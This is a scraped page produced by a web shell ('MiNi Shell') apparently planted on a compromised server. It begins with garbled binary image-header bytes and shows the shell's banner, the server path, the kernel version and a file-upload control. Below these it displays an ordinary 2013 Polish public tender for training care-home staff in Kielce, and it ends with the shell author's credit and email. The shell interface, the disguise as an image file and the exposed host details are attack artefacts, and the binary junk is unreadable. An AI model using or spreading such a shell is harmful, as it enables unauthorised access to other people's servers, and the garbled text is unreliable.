JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130905/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130905/359886-N-2013.html

<p class="kh_header"><b>Kielce: Usługi szkoleniowe w ramach Projektu poprawa jakości usług opieki społecznej poprzez utworzenie lokali aktywizujących dla osób starszych i niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Domu Pomocy Społecznej im. Jana Pawła II w Kielcach</b><br>
<b>Numer ogłoszenia: 359886 - 2013; data zamieszczenia: 05.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Kielcach , ul. Studzienna 2, 25-544 Kielce, woj. świętokrzyskie, tel. 041 3312524, faks 041 3685057.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w ramach Projektu poprawa jakości usług opieki społecznej poprzez utworzenie lokali aktywizujących dla osób starszych i niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Domu Pomocy Społecznej im. Jana Pawła II w Kielcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem prowadzonego postępowania jest udzielenie zamówienia publicznego na przeprowadzenie n/w zajęć zwanych szkoleniami;  
Część 1:
Metoda McKenzie dla 3 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 130h.. Szkolenie musi odbywać się na terenie miasta Kielce. Szkolenie powinno rozpocząć się w II kwartale 2014 roku a zakończyć w III kwartale 2015.

Część 2:
Metoda PNF dla 3 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 150h. Szkolenie musi odbywać się na terenie miasta Kielce. Termin rozpoczęcia szkolenia to IV kwartał 2013 roku. 

Część 3:
Metoda Bobath dla1 osoby - Minimalna liczba godzin całego szkolenia powinna wynosić 110h. Termin rozpoczęcia szkolenia to III kwartał 2014 roku. Szkolenie musi odbywać się na terenie miasta Kielce lub w innym mieście na terenie Polski. Organizator zapewnia dojazd, powrót i zakwaterowanie podczas pobytu na szkoleniu jeżeli szkolenie odbywać się będzie w innym mieście niż Kielce.

Część 4:  
Metoda KinesioTapingdla 3 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 32h. Szkolenie musi odbywać się na terenie miasta Kielce. Termin rozpoczęcia szkolenia to IV kwartał 2013 roku.

Część 5:
Metoda NordicWalking dla 2 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 15h. Szkolenie musi odbywać się na terenie miasta Kielce. Termin rozpoczęcia szkolenia to III kwartał 2014 roku.

Część 6:
Metoda laseroterapia dla 3 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 9h. Szkolenie musi odbywać się na terenie miasta Kielce. Termin rozpoczęcia szkolenia to II kwartał 2014 roku.

Część 7:
-Moduł 1
Zaburzenia psychosomatyczne a funkcjonowanie osoby starszej dla 17 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 9h. Szkolenie powinno być podzielone na 3 grupy szkoleniowe.  Termin rozpoczęcia szkolenia to III kwartał 2013 roku.

-Moduł 2
Rozwiązywanie problemów materialnych, prawnych, rodzinnych podopiecznego - współpraca z różnymi podmiotami dla 7 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 9h. Termin szkolenia to III kwartał 2013 roku.

-Moduł 3
Nawiązywanie i utrzymanie kontaktów międzyludzkich. Zasady komunikacji w procesie wspierania osób starszych i niesamodzielnych dla 17 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 30h. Szkolenie powinno być podzielone na 2 grupy szkoleniowe po 15 osób. Termin rozpoczęcia szkolenia to IV kwartał 2013 roku.

-Moduł 4
Aktywizacja podopiecznego w zakresie utrzymania sprawności fizycznej i samodzielności życiowejdla 17 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 18h. Szkolenie powinno być podzielona na dwie grupy szkoleniowe po 15 osób. Termin szkolenia to IV kwartał 2013 roku.

-Moduł 5
Ćwiczenia odpowiednie do wieku i sprawności fizycznej dla 11 osób  - Minimalna liczba godzin całego szkolenia powinna wynosić 18h. Termin szkolenia to IV kwartał 2013 roku.

-Moduł 6
Zdrowy styl życia, działalność prozdrowotna i profilaktyczna dla 6 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 18h. Termin szkolenia to I kwartał 2014 roku.

-Moduł 7
Pomoc w prowadzeniu gospodarstwa domowego i gospodarowaniu budżetem dla 17 osób  - Minimalna liczba godzin całego szkolenia powinna wynosić 9h. Szkolenie powinno być podzielone na 2 grupy szkoleniowe po 15 osób. Termin szkolenia to I kwartał 2014 roku.

-Moduł 8
Rozwiązywanie sytuacji trudnych i konfliktowych, rola rzecznika praw i interesów podopiecznego dla 17 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 9h. Szkolenie powinno być podzielone na 2 grupy szkoleniowe po 15 osób. Termin szkolenia to I kwartał 2014 roku.

-Moduł 9
Metody i techniki radzenia sobie ze stresem dla 17 osób  - Minimalna liczba godzin całego szkolenia powinna wynosić 15h. Szkolenie powinno być podzielone na 2 grupy szkoleniowe po 15 osób. Termin szkolenia to I kwartał 2014 roku.

-Moduł 10
Organizowanie aktywnego spędzania czasu i wspieranie zdolności twórczych dla 17 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 15h. Szkolenie powinno być podzielone na 2 grupy szkoleniowe po 15 osób. Termin szkolenia to II kwartał 2014 roku.

-Moduł 11
Alternatywne metody komunikacji: system Braillea, Blissa itp. dla 17 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 30h. Szkolenie powinno być podzielone na 2 grupy szkoleniowe po 15 osób. Termin szkolenia to II kwartał 2014 roku.

-Moduł 12
Pierwsza pomoc w stanach zagrożenia życia i zdrowia podopiecznego dla 17 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 30h. Termin szkolenia to II kwartał 2014 roku.

-Moduł 13
Opiekun w domu pomocy społecznej dla 11 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 60h. Termin rozpoczęcia szkolenia to II kwartał 2014 roku.

-Moduł 14
Ochrona danych osobowych w domu pomocy społecznej dla 6 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 16h. Termin szkolenia to III kwartał 2013 roku.

-Moduł 15
Profesjonalna obsługa trudnego klientadla 6 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 16h. Termin rozpoczęcia szkolenia to II kwartał 2013 roku.

-Moduł 16
Asystent rodzinydla 6 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 60h. Termin szkolenia to IV kwartał 2013 roku.

-Moduł 17
Terapia zajęciowa w systemie rehabilitacjidla 4 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 30h. Termin szkolenia to III kwartał 2013 roku.

-Moduł 18
Metody i techniki terapii zajęciowej w chorobach wieku podeszłego dla 4 osób ?- Minimalna liczba godzin całego szkolenia powinna wynosić 30h.

-Moduł 19
Rekreacja i turystyka jako obszar kultury fizycznej w usprawnianiu osób niepełnosprawnych dla 3 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 8h. Termin szkolenia to IV kwartał 2013 roku.

-Moduł 20
Warsztaty florystyczne przygotowujące do pracy z osobami niepełnosprawnymi dla 2 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 120h. Szkolenie powinno mieć charakter warsztatów praktycznych. Termin szkolenia to IV kwartał 2013 roku. 

-Moduł 21
Warsztaty witrażu Tiffany dla 2 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 30h. Termin szkolenia to I kwartał 2014 roku.

-Moduł 22
Kurs języka migowego p.j.m. dla  8 osób- Minimalna liczba godzin całego szkolenia powinna wynosić 60h. Termin szkolenia to I kwartał 2014 roku.

-Moduł 23
Terapia behawioralna część I,II,III dla 4 osób - Minimalna liczba godzin całego szkolenia powinna wynosić 45h.  Termin rozpoczęcia szkolenia to I kwartał 2014 roku..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje wykonanie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy do 50% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla części 1-6 wadium nie jest wymagane 
Dla części 7
Wadium w wysokości 3.000,00zł  (trzy tysiące złotych00/100) należy wnieść przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć; 
wykaz wykonanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie. 
Wykonawca potwierdzi spełnianie niniejszego warunku udziału w postępowaniu, jeżeli złoży wykaz wszystkich najważniejszych wykonanych w tym okresie usług, a w ramach tych usług wykonał minimum:
Dla:
Część 1:
Minimum jedna usługa szkoleniowa z tematu Metoda McKenzie dla minimum  3 osób 

Część 2:
Minimum jedna usługa szkoleniowa z tematu Metoda PNF dla minimum 3 osób 

Część 3:
Minimum jedna usługa szkoleniowa z tematu  Metoda Bobath dla minimum  1 osoby 

Część 4:  
Minimum jedna usługa szkoleniowa z tematu  Metoda KinesioTaping dla minimum  3 

Część 5:
Minimum jedna usługa szkoleniowa z tematu  Metoda NordicWalking dla minimum  2 osób 

Część 6:
Minimum jedna usługa szkoleniowa z tematu Metoda laseroterapia dla minimum  3 osób
Dla części 7
9 zakończonych warsztatów / szkoleń grupowych po trzy z n/w zakresu: 

-opieki nad osobami niepełnosprawnymi, pracy z trudnym klientem lub
profesjonalnej obsługi klienta i aktywizacji seniorów
-przemocy w rodzinie, rozwiązywania problemów alkoholowych i efektywnej komunikacji interpersonalnej
-pomocy lub asysty rodzinie, rodzicielstwa zastępczego i opieki nad dzieckiem

na kwotę łączną nie mniejszą niż 80 000,00 zł brutto;

Szkolenie grupowe to szkolenia dla minimum 9 osób.

Do pozycji wykazu dotyczących opisanych wyżej szkoleń należy załączyć dowody określające, czy usługi te zostały wykonane w sposób należyty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy przedłożyć; wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia (przez doświadczenie należy rozumieć udział, jako wykładowca/trener w jednym zakończonym szkoleniu grupowym) oraz informacji o podstawie do dysponowania tymi osobami - Potwierdzeniem spełniania warunku będzie przedstawienie wykazu zawierającego nie mniej niż;

Część 1
1.Metoda McKenzie-Minimum 1 osoba posiadającawykształcenie wyższe - fizjoterapia, doświadczenie w prowadzeniu zajęć z metody McKenzie
Część 2
1.Metoda PNF-Minimum 1 osoba posiadającawykształcenie wyższe - fizjoterapia, doświadczenie w prowadzeniu zajęć z metody PNF
Część 3
1.Metoda Bobath-Minimum 1 osoba posiadającawykształcenie wyższe - fizjoterapia, doświadczenie w prowadzeniu zajęć z metody Bobath
Część 4
1.Metoda KinesioTaping-Minimum 1 osoba posiadającawykształcenie wyższe - fizjoterapia, doświadczenie w prowadzeniu zajęć z metody KinesioTaping
Część 5
1.Metoda NordicWalking	-Minimum 1 osoba posiadającawykształcenie wyższe, doświadczenie w prowadzeniu zajęć z metody NordicWalking
Część 6
1.Metoda laseroterapia -Minimum 1 osoba posiadającawykształcenie wyższe, doświadczenie w prowadzeniu zajęć z laseroterapii
Część 7
1.Moduł 1
Zaburzenia psychosomatyczne a funkcjonowanie osoby starszej  -Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
2.Moduł 2
Rozwiązywanie problemów materialnych, prawnych, rodzinnych podopiecznego-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
3.Moduł 3
Nawiązywanie i utrzymanie kontaktów międzyludzkich. Zasady komunikacji w procesie wspierania osób starszych i niesamodzielnych-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
4.Moduł 4
Aktywizacja podopiecznego w zakresie utrzymania sprawności fizycznej i samodzielności życiowe-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
5.Moduł 5
Ćwiczenia odpowiednie do wieku i sprawności fizycznej-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
6.Moduł 6
Zdrowy styl życia, działalność prozdrowotna i profilaktyczna	-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
7.Moduł 7
Pomoc w prowadzeniu gospodarstwa domowego i gospodarowaniu budżetem -	Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
8.Moduł 8
Rozwiązywanie sytuacji trudnych i konfliktowych, rola rzecznika praw i interesów podopiecznego-	Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
9.Moduł 9
Metody i techniki radzenia sobie ze stresem-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
10.Moduł 10
Organizowanie aktywnego spędzania czasu i wspieranie zdolności twórczych-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
11.Moduł 11
Alternatywne metody komunikacji: system Braillea, Blissaitp	Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
12.Moduł 12
Pierwsza pomoc w stanach zagrożenia życia i zdrowia podopiecznego  	Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
13.Moduł 13
Opiekun w domu pomocy społecznej	-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
14.Moduł 14
Ochrona danych osobowych w domu pomocy społecznej-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
15.Moduł 15
Profesjonalna obsługa trudnego klienta-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
16.Moduł 16
Asystent rodziny-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
17.Moduł 17
Terapia zajęciowa w systemie rehabilitacji-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
18.Moduł 18
Metody i techniki terapii zajęciowej w chorobach wieku podeszłego-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
19.Moduł 19
Rekreacja i turystyka jako obszar kultury fizycznej w usprawnianiu osób niepełnosprawnych-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
20.Moduł 20
Warsztaty florystyczne przygotowujące do pracy z osobami niepełnosprawnymi-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
21.Moduł 21
Warsztaty witrażu Tiffany-Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
22.Moduł 22
Kurs języka migowego p.j.m.-Minimum 1 osoba posiadająca certyfikat tłumacza języka migowego T1, doświadczenie w prowadzeniu zajęć z wymienionego zakresu;
23.Moduł 23
Terapia behawioralna część I,II,III-	Minimum 1 osoba posiadająca wykształcenie wyższe, wymieniona osoba musi posiadać doświadczenie w prowadzeniu zajęć z wymienionego zakresu;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie - 30</li>
<li>3 - certyfikat w zakresie jakości usług szkoleniowych - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z zapisami określonymi w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Kielcach 
ul. Studzienna 2; 25-544 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2013 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego - (MOPR w Kielcach ul. Studzienna 2 - sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Poprawa jakości usług opieki społecznej poprzez utworzenie lokali aktywizujących dla osób starszych i niepełnosprawnych oraz podniesienie kwalifikacji zawodowych personelu Domu Pomocy Społecznej im. Jana Pawła II w Kielcach
Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com